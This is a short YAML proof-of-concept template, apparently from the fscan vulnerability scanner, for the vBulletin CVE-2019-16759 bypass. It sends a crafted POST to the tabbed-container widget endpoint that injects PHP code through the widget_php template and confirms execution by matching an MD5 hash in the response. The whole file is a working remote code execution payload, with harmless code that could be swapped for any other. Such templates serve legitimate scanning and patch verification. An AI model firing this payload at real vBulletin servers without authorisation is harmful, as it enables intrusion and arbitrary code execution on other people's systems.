fscan/Web_Scan/pocs/vbulletin-cve-2019-16759-by...

18 lines
651 B
YAML

name: poc-yaml-vbulletin-cve-2019-16759-bypass
set:
f1: randomInt(800000000, 900000000)
rules:
- method: POST
path: /ajax/render/widget_tabbedcontainer_tab_panel
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}}));
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json")
detail:
author: Loneyer
links:
- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/